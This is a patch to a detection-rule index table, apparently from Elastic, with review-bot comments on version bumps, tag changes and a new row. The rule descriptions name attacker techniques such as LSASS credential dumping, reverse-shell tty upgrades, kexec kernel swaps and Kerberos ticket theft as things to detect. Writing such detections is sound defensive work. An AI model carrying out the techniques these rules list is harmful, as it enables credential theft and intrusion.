@@ -654,7 +664,7 @@ and their rule type is `machine_learning`. |<<group-policy-discovery-via-microsoft-gpresult-utility, Group Policy Discovery via Microsoft GPResult Utility>> |Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> |Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |103 +|<<halfbaked-command-and-control-beacon, Halfbaked Command and Control Beacon>> |Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 |<<hidden-files-and-directories-via-hidden-flag, Hidden Files and Directories via Hidden Flag>> |Identify activity related where adversaries can add the 'hidden' flag to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 
@@ -662,9 +672,9 @@ and their rule type is `machine_learning`. |<<high-mean-of-rdp-session-duration, High Mean of RDP Session Duration>> |A machine learning job has detected unusually high mean of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<high-number-of-okta-user-password-reset-or-unlock-attempts, High Number of Okta User Password Reset or Unlock Attempts>> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |106 +|<<high-number-of-okta-user-password-reset-or-unlock-attempts, High Number of Okta User Password Reset or Unlock Attempts>> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |207 -|<<high-number-of-process-terminations, High Number of Process Terminations>> |This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<high-number-of-process-terminations, High Number of Process Terminations>> |This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<high-number-of-process-and-or-service-terminations, High Number of Process and/or Service Terminations>> |This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 
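Review bot: the High Number of Okta User Password Reset or Unlock Attempts row moves its minimum stack version from 8.3.0 to 8.10.0 (version 106 to 207), the largest compatibility jump in this patch; confirm it is intended and documented, because the rule will no longer update on any 8.3 through 8.9 stack. The High Number of Process Terminations row below it is a plain 108 to 109 bump.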
@@ -672,27 +682,29 @@ and their rule type is `machine_learning`. |<<host-files-system-changes-via-windows-subsystem-for-linux, Host Files System Changes via Windows Subsystem for Linux>> |Detects files creation and modification on the host system from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<hosts-file-modified, Hosts File Modified>> |The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<hosts-file-modified, Hosts File Modified>> |The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<hping-process-activity, Hping Process Activity>> |Hping ran on a Linux host. 
Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<hping-process-activity, Hping Process Activity>> |Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<iis-http-logging-disabled, IIS HTTP Logging Disabled>> |Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 |<<ipsec-nat-traversal-port-activity, IPSEC NAT Traversal Port Activity>> |This rule detects events that could be describing IPSEC NAT Traversal traffic. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal enables these tunnels to communicate over the Internet where one of the sides is behind a NAT router gateway. This may be common on your network, but this technique is also used by threat actors to avoid detection. 
|[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |104 -|<<image-file-execution-options-injection, Image File Execution Options Injection>> |The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<image-file-execution-options-injection, Image File Execution Options Injection>> |The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 + +|<<image-loaded-with-invalid-signature, Image Loaded with Invalid Signature>> |Identifies binaries that are loaded and with an invalid code signature. This may indicate an attempt to masquerade as a signed binary. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 |<<imageload-via-windows-update-auto-update-client, ImageLoad via Windows Update Auto Update Client>> |Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> |Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. |[Use Case: Threat Detection], [Tactic: Initial Access], [Domain: Endpoint] |8.3.0 |103 +|<<inbound-connection-to-an-unsecure-elasticsearch-node, Inbound Connection to an Unsecure Elasticsearch Node>> |Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. |[Use Case: Threat Detection], [Tactic: Initial Access], [Domain: Endpoint] |8.3.0 |104 |<<incoming-dcom-lateral-movement-via-mshta, Incoming DCOM Lateral Movement via MSHTA>> |Identifies the use of Distributed Component Object Model (DCOM) to execute commands from a remote host, which are launched via the HTA Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally while attempting to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> |Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 +|<<incoming-dcom-lateral-movement-with-mmc, Incoming DCOM Lateral Movement with MMC>> |Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<incoming-dcom-lateral-movement-with-shellbrowserwindow-or-shellwindows, Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows>> |Identifies use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the ShellBrowserWindow or ShellWindows Application COM Object. This behavior may indicate an attacker abusing a DCOM application to stealthily move laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> |Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |106 +|<<incoming-execution-via-powershell-remoting, Incoming Execution via PowerShell Remoting>> |Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |107 |<<incoming-execution-via-winrm-remote-shell, Incoming Execution via WinRM Remote Shell>> |Identifies remote execution via Windows Remote Management (WinRM) remote shell on a target host. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |106 
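Review bot: the new Image Loaded with Invalid Signature row adds the cross-reference `<<image-loaded-with-invalid-signature, Image Loaded with Invalid Signature>>` and is preceded by an added blank line; make sure the corresponding rule page is among the files this patch adds, otherwise the build ends up with a dangling anchor, and check that the blank line before the row matches how neighbouring rows in this table are separated. The remaining rows in the hunk are tag additions ([Tactic: Defense Evasion] on Image File Execution Options Injection and Incoming DCOM Lateral Movement with MMC, [Tactic: Execution] on Incoming Execution via PowerShell Remoting) with matching version bumps.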
@@ -706,31 +718,31 @@ and their rule type is `machine_learning`. |<<installation-of-custom-shim-databases, Installation of Custom Shim Databases>> |Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 -|<<installation-of-security-support-provider, Installation of Security Support Provider>> |Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<installation-of-security-support-provider, Installation of Security Support Provider>> |Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<interactive-exec-command-launched-against-a-running-container, Interactive Exec Command Launched Against A Running Container>> |This rule detects interactive 'exec' events launched against a container using the 'exec' command. Using the 'exec' command in a pod allows a user to establish a temporary shell session and execute any process/command inside the container. This rule specifically targets higher-risk interactive commands that allow real-time interaction with a container's shell. 
A malicious actor could use this level of access to further compromise the container environment or attempt a container breakout. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 -|<<interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> |Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<interactive-terminal-spawned-via-perl, Interactive Terminal Spawned via Perl>> |Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> |Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<interactive-terminal-spawned-via-python, Interactive Terminal Spawned via Python>> |Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<krbtgt-delegation-backdoor, KRBTGT Delegation Backdoor>> |Identifies the modification of the msDS-AllowedToDelegateTo attribute to KRBTGT. Attackers can use this technique to maintain persistence to the domain by having the ability to request tickets for the KRBTGT service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 |<<kerberos-cached-credentials-dumping, Kerberos Cached Credentials Dumping>> |Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> |Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |107 +|<<kerberos-pre-authentication-disabled-for-user, Kerberos Pre-authentication Disabled for User>> |Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |108 |<<kerberos-traffic-from-unusual-process, Kerberos Traffic from Unusual Process>> |Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<kernel-load-or-unload-via-kexec-detected, Kernel Load or Unload via Kexec Detected>> |This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. 
Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<kernel-module-removal, Kernel Module Removal>> |Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<kernel-module-load-via-insmod, Kernel Module Load via insmod>> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<kernel-module-load-via-insmod, Kernel module load via insmod>> |Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Rootkit], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<kernel-module-removal, Kernel Module Removal>> |Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<keychain-password-retrieval-via-command-line, Keychain Password Retrieval via Command Line>> |Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<kirbi-file-creation, Kirbi File Creation>> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<kirbi-file-creation, Kirbi File Creation>> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<kubernetes-anonymous-request-authorized, Kubernetes Anonymous Request Authorized>> |This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously. |[Data Source: Kubernetes], [Tactic: Execution], [Tactic: Initial Access], [Tactic: Defense Evasion] |8.4.0 |5 
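Review bot: the typo "suspcious" survives in the re-added insmod row ("can indicate suspcious or malicious behavior"); this table is generated from each rule's description, so fix the `description` field in the rule source and regenerate rather than editing the asciidoc, or the next docs run brings it back. The rest of the hunk reads correctly: the title-case fix ("Kernel module load via insmod" to "Kernel Module Load via insmod") is what moves the row ahead of "Kernel Module Removal" in the case-sensitive sort, so the reorder is expected. For "Kerberos Pre-authentication Disabled for User" the new [Tactic: Defense Evasion] and [Tactic: Privilege Escalation] tags arrive with an unchanged description that only talks about AS-REP roasting; worth a spot check that the linked rule page carries matching technique mappings so the tags are not orphaned.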
@@ -760,9 +772,9 @@ and their rule type is `machine_learning`. |<<lsass-memory-dump-handle-access, LSASS Memory Dump Handle Access>> |Identifies handle requests for the Local Security Authority Subsystem Service (LSASS) object access with specific access masks that many tools with a capability to dump memory to disk use (0x1fffff, 0x1010, 0x120089). This rule is tool agnostic as it has been validated against a host of various LSASS dump tools such as SharpDump, Procdump, Mimikatz, Comsvcs etc. It detects this behavior at a low level and does not depend on a specific tool or dump file name. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |8.3.0 |108 -|<<lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> |Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.7.0 |3 +|<<lsass-process-access-via-windows-api, LSASS Process Access via Windows API>> |Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Data Source: Elastic Defend] |8.7.0 |4 -|<<lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> |Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<lateral-movement-via-startup-folder, Lateral Movement via Startup Folder>> |Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<launch-agent-creation-or-modification-and-immediate-loading, Launch Agent Creation or Modification and Immediate Loading>> |An adversary can establish persistence by installing a new launch agent that executes at login by using launchd or launchctl to load a plist into the appropriate directories. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 
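Review bot: [Tactic: Execution] is added to "LSASS Process Access via Windows API" while its description still covers only handle access to LSASS for credential dumping, so a reader of this table gets no hint which execution behaviour the rule now detects; either extend the description in the rule source to name it, or confirm the tactic is backed by a technique mapping on the rule page rather than being a stray tag. The "Lateral Movement via Startup Folder" bump (104 to 105) with identical text and tags is presumably a query-only change and needs nothing here.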
@@ -770,7 +782,7 @@ and their rule type is `machine_learning`. |<<linux-group-creation, Linux Group Creation>> |Identifies attempts to create a new group. Attackers may create new groups to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |2 -|<<linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> |Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 +|<<linux-restricted-shell-breakout-via-linux-binary-s, Linux Restricted Shell Breakout via Linux Binary(s)>> |Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |110 |<<linux-secret-dumping-via-gdb, Linux Secret Dumping via GDB>> |This rule monitors for potential memory dumping through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 
@@ -778,11 +790,11 @@ and their rule type is `machine_learning`. |<<linux-user-account-creation, Linux User Account Creation>> |Identifies attempts to create new users. Attackers may add new users to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |2 -|<<linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> |Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |3 +|<<linux-user-added-to-privileged-group, Linux User Added to Privileged Group>> |Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 -|<<linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> |This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |1 +|<<linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> |This rule monitors for the potential memory dump of the init process (PID 1) through gdb. 
Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |2 -|<<local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 +|<<local-account-tokenfilter-policy-disabled, Local Account TokenFilter Policy Disabled>> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 |<<local-scheduled-task-creation, Local Scheduled Task Creation>> |Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |105 
